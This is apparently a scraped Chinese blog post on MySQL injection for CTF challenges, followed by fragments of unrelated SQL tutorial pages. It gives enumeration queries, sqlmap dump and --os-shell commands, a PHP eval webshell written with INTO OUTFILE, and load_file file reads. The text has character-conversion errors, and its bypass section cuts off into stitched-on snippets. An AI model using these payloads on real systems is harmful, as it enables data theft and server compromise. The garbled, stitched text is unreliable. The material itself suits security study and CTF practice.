mysql注入思路及常用語句

2021-10-10 18:36:35 字數 1265 閱讀 4423

一般而言,其實最後sql注入題目有兩種類目的,乙個是key在表中,要徹底搞明白表結構,乙個是key在檔案中要寫shell或者讀取檔案。

一、讀表:

手工:

1.查列名:

select column_name information_schema.columns where table_schema = 『sql_test』 and table_name = 『flag』 limit 1,1;#

2.查表名:

select table_name from information_schema.tables where table_schema=』sql_test'limit 0,1;#

3.查庫名:

select database() limit 0,1;#

sqlmap:

1.sqlmap.py -r a.txt --level 3 -d uinfo --dbs

2.sqlmap.py -r a.txt --level 3 -d uinfo --tables

3.sqlmap.py -r a.txt --level 3 -d uinfo -t users -columns

3.sqlmap.py -r a.txt --level 3 -d uinfo -t users -c remark -dump

二、shell:

1.select寫shell:

select 1,2,3,』<?php eval($_post[cmd]); ?>』 into outfile 『/var/www/html/abc.php』;#

2.sqlmap得到shell:

sqlmap ***x --os-shell

3.select讀檔案:

load_file(』/tmp/360/key』)

三、閉合:

'、%、"、]、)

%是在like查詢的時候會用到。

這裡需要乙個個組合試驗,可以用python寫個指令碼來做字典。如果有時間,今天下午我寫。

四、繞過:

mysql常用語句 MySQL常用語句

create table student id int primary key auto increment comment 學號 name varchar 200 comment 姓名 age int comment 年齡 comment 學生資訊 修改表注釋 alter table studen...

SQL注入常用語句

一 判斷型別 用and判斷其字元型別 and 1 1 正常返回 and 1 2 頁面正常,但是與上個頁面相比,沒有查詢資料 沒對sql輸入做特殊過濾和處理 字元型 上兩條必須是一起判斷的 and 1 1 非正常返回,顯示錯誤。可能性 1.有過濾 2.閉合符不對 3.不是字元型 總 如果是字元型,那麼...

php mysql 常用語句 mysql常用語句

一 修改mysql使用者密碼 mysql h localhost u root p 命令列登入 update user set password password 123456 where user root 二 資料庫操作 show databases 顯示資料庫 create database ...